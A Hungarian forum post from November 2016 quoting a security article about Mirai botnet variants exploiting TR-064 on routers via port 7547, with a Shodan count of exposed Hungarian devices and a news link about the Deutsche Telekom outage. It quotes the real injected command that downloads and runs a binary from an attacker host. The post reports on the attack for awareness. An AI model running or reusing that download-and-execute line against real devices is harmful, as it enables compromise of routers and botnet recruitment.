New Mirai attack vector – bot exploits a recently discovered router vulnerability

 ( toMpEr | 2016. november 29., kedd - 2:16 )

The router rebooted every 15 to 20 minutes. The reader looked at the config and realized that his router got a new, suspicious entry in the NTP server name field, namely:
cd /tmp;wget http://l.ocalhost.host/2;chmod 777 2;./2
[...]
The ISPs of the entire world have the need to manage their infrastructure – in particular your modems or routers.
One of those protocols is called TR-064, also know as LAN-Side DSL CPE Configuration
On some modems and routers TR-064 is publicly available to the outside world. It means that any internet user can command those devices to for example change DNS or NTP settings.
https://badcyber.com/new-mirai-attack-vector-bot-exploits-a-recently-discovered-router-vulnerability/

Magyarországon 176157 IP esetében érhető el az Internet felől az érintett 7547-es port.

via https://www.shodan.io/search?query=port%3A7547+country%3Ahu

Hozzászólás megjelenítési lehetőségek

A választott hozzászólás megjelenítési mód a „Beállítás” gombbal rögzíthető.

900,000 Routers Knocked Offline in Germany amid Rumors of Cyber-Attack

UPDATE 5: Malware experts at Kaserpsky Lab have also confirmed a version of the Mirai IoT malware is behind the attacks on Deutsche Telekom routers.

http://www.bleepingcomputer.com/news/security/900-000-routers-knocked-offline-in-germany-amid-rumors-of-cyber-attack/